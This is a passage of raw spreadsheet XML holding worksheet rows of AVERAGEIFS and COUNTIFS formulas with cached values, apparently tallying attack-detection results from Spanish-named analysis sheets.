      <c r="X139" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y139" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z139" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB139" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC139" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD139" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="140">
      <c r="K140" s="352" t="s">
        <v>1812</v>
      </c>
      <c r="L140" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CP$131)
</f>
        <v>1</v>
      </c>
      <c r="M140" s="374">
        <f>'(D) - Análisis Resultados II - '!CE22</f>
        <v>0</v>
      </c>
      <c r="N140" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K140)</f>
        <v>1</v>
      </c>
      <c r="O140" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P140" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q140" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T140" s="865" t="s">
        <v>1812</v>
      </c>
      <c r="U140" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CP$131)
</f>
        <v>1</v>
      </c>
      <c r="V140" s="69">
        <v>0.0</v>
      </c>
      <c r="W140" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T140)</f>
        <v>1</v>
      </c>
      <c r="X140" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y140" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z140" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB140" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC140" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD140" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="141">
      <c r="K141" s="352" t="s">
        <v>1958</v>
      </c>
      <c r="L141" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="M141" s="374">
        <f>'(D) - Análisis Resultados II - '!CF22</f>
        <v>0</v>
      </c>
      <c r="N141" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K141)</f>
        <v>1</v>
      </c>
      <c r="O141" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P141" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q141" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T141" s="865" t="s">
        <v>1958</v>
      </c>
      <c r="U141" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="V141" s="69">
        <v>1.0</v>
      </c>
      <c r="W141" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T141)</f>
        <v>1</v>
      </c>
      <c r="X141" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y141" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z141" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB141" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC141" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD141" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="142">
      <c r="K142" s="352" t="s">
        <v>1667</v>
      </c>
      <c r="L142" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M142" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CG22</f>
        <v>-</v>
      </c>
      <c r="N142" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K142)</f>
        <v>0</v>
      </c>
      <c r="O142" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P142" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q142" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T142" s="865" t="s">
        <v>1667</v>
      </c>
      <c r="U142" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V142" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W142" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T142)</f>
        <v>0</v>
      </c>
      <c r="X142" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y142" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z142" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB142" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC142" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD142" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="143">
      <c r="K143" s="352" t="s">
        <v>505</v>
      </c>
      <c r="L143" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M143" s="374">
        <f>'(D) - Análisis Resultados II - '!CH22</f>
        <v>0.5000989647</v>
      </c>
      <c r="N143" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K143)</f>
        <v>0</v>
      </c>
      <c r="O143" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P143" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q143" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T143" s="865" t="s">
        <v>505</v>
      </c>
      <c r="U143" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V143" s="69">
        <v>0.9920891936509395</v>
      </c>
      <c r="W143" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T143)</f>
        <v>0</v>
      </c>
      <c r="X143" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y143" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z143" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB143" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC143" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD143" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="144">
      <c r="K144" s="352" t="s">
        <v>312</v>
      </c>
      <c r="L144" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="M144" s="374">
        <f>'(D) - Análisis Resultados II - '!CI22</f>
        <v>0.005988023952</v>
      </c>
      <c r="N144" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K144)</f>
        <v>1</v>
      </c>
      <c r="O144" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P144" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q144" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T144" s="865" t="s">
        <v>312</v>
      </c>
      <c r="U144" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CT$131)
</f>
        <v>0.005988023952</v>
      </c>
      <c r="V144" s="69">
        <v>0.0</v>
      </c>
      <c r="W144" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T144)</f>
        <v>1</v>
      </c>
      <c r="X144" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y144" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z144" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB144" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC144" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD144" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="145">
      <c r="K145" s="352" t="s">
        <v>2289</v>
      </c>
      <c r="L145" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M145" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CJ22</f>
        <v>-</v>
      </c>
      <c r="N145" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K145)</f>
        <v>0</v>
      </c>
      <c r="O145" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P145" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q145" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T145" s="865" t="s">
        <v>2289</v>
      </c>
      <c r="U145" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V145" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W145" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T145)</f>
        <v>0</v>
      </c>
      <c r="X145" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y145" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z145" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB145" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC145" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD145" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="146">
      <c r="K146" s="352" t="s">
        <v>411</v>
      </c>
      <c r="L146" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CV$131)
</f>
        <v>0</v>
      </c>
      <c r="M146" s="374">
        <f>'(D) - Análisis Resultados II - '!CK22</f>
        <v>0</v>
      </c>
      <c r="N146" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K146)</f>
        <v>1</v>
      </c>
      <c r="O146" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P146" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q146" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T146" s="865" t="s">
        <v>411</v>
      </c>
      <c r="U146" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CV$131)
</f>
        <v>0</v>
      </c>
      <c r="V146" s="69">
        <v>0.0</v>
      </c>
      <c r="W146" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T146)</f>
        <v>1</v>
      </c>
      <c r="X146" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y146" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z146" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB146" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC146" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD146" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="147">
      <c r="K147" s="352" t="s">
        <v>1361</v>
      </c>
      <c r="L147" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M147" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CL22</f>
        <v>-</v>
      </c>
      <c r="N147" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K147)</f>
        <v>0</v>
      </c>
      <c r="O147" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P147" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q147" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T147" s="865" t="s">
        <v>1361</v>
      </c>
      <c r="U147" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V147" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W147" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T147)</f>
        <v>0</v>
      </c>
      <c r="X147" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y147" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z147" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB147" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC147" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD147" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="148">
      <c r="K148" s="352" t="s">
        <v>701</v>
      </c>
      <c r="L148" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CX$131)
</f>
        <v>0</v>
      </c>
      <c r="M148" s="374">
        <f>'(D) - Análisis Resultados II - '!CM22</f>
        <v>0</v>
      </c>
      <c r="N148" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K148)</f>
        <v>1</v>
      </c>
      <c r="O148" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P148" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q148" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T148" s="865" t="s">
        <v>701</v>
      </c>
      <c r="U148" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CX$131)
</f>
        <v>0</v>
      </c>
      <c r="V148" s="69">
        <v>0.0</v>
      </c>
      <c r="W148" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T148)</f>
        <v>1</v>
      </c>
      <c r="X148" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y148" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z148" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB148" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC148" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD148" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="149">
      <c r="D149" s="576" t="s">
        <v>2773</v>
      </c>
      <c r="E149" s="221"/>
      <c r="F149" s="221"/>
      <c r="G149" s="222"/>
      <c r="K149" s="352" t="s">
        <v>586</v>
      </c>
      <c r="L149" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="M149" s="374">
        <f>'(D) - Análisis Resultados II - '!CN22</f>
        <v>0</v>
      </c>
      <c r="N149" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K149)</f>
        <v>2</v>
      </c>
      <c r="O149" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P149" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q149" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T149" s="865" t="s">
        <v>586</v>
      </c>
      <c r="U149" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="V149" s="69">
        <v>1.0</v>
      </c>
      <c r="W149" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T149)</f>
        <v>2</v>
      </c>
      <c r="X149" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y149" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z149" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB149" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC149" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD149" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="150">
      <c r="K150" s="352" t="s">
        <v>294</v>
      </c>
      <c r="L150" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M150" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CO22</f>
        <v>-</v>
      </c>
      <c r="N150" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K150)</f>
        <v>0</v>
      </c>
      <c r="O150" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P150" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q150" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T150" s="865" t="s">
        <v>294</v>
      </c>
      <c r="U150" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V150" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W150" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T150)</f>
        <v>0</v>
      </c>
      <c r="X150" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y150" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z150" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB150" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC150" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD150" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="151">
      <c r="K151" s="352" t="s">
        <v>339</v>
      </c>
      <c r="L151" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M151" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CP22</f>
        <v>-</v>
      </c>
      <c r="N151" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K151)</f>
        <v>0</v>
      </c>
      <c r="O151" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P151" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q151" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T151" s="865" t="s">
        <v>339</v>
      </c>
      <c r="U151" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V151" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W151" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T151)</f>
        <v>0</v>
      </c>
      <c r="X151" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y151" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z151" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB151" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC151" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD151" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="152">
      <c r="D152" s="20" t="s">
        <v>2774</v>
      </c>
      <c r="E152" s="20">
        <v>14.0</v>
      </c>
      <c r="F152" s="20" t="s">
        <v>2775</v>
      </c>
      <c r="G152" s="336">
        <f>E153/E152</f>
        <v>1</v>
      </c>
      <c r="K152" s="352" t="s">
        <v>370</v>
      </c>
      <c r="L152" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M152" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CQ22</f>
        <v>-</v>
      </c>
      <c r="N152" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K152)</f>
        <v>0</v>
      </c>
      <c r="O152" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P152" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q152" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T152" s="865" t="s">
        <v>370</v>
      </c>
      <c r="U152" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V152" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W152" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T152)</f>
        <v>0</v>
      </c>
      <c r="X152" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y152" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z152" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB152" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC152" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD152" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="153">
      <c r="D153" s="20" t="s">
        <v>2776</v>
      </c>
      <c r="E153" s="20">
        <v>14.0</v>
      </c>
      <c r="F153" s="49" t="s">
        <v>2777</v>
      </c>
      <c r="G153" s="585">
        <f>E155/E154</f>
        <v>1</v>
      </c>
      <c r="K153" s="352" t="s">
        <v>394</v>
      </c>
      <c r="L153" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M153" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CR22</f>
        <v>-</v>
      </c>
      <c r="N153" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K153)</f>
        <v>0</v>
      </c>
      <c r="O153" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P153" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q153" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T153" s="865" t="s">
        <v>394</v>
      </c>
      <c r="U153" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V153" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W153" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T153)</f>
        <v>0</v>
      </c>
      <c r="X153" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y153" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z153" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB153" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC153" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD153" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="154">
      <c r="D154" s="874" t="s">
        <v>2778</v>
      </c>
      <c r="E154" s="875">
        <v>74.0</v>
      </c>
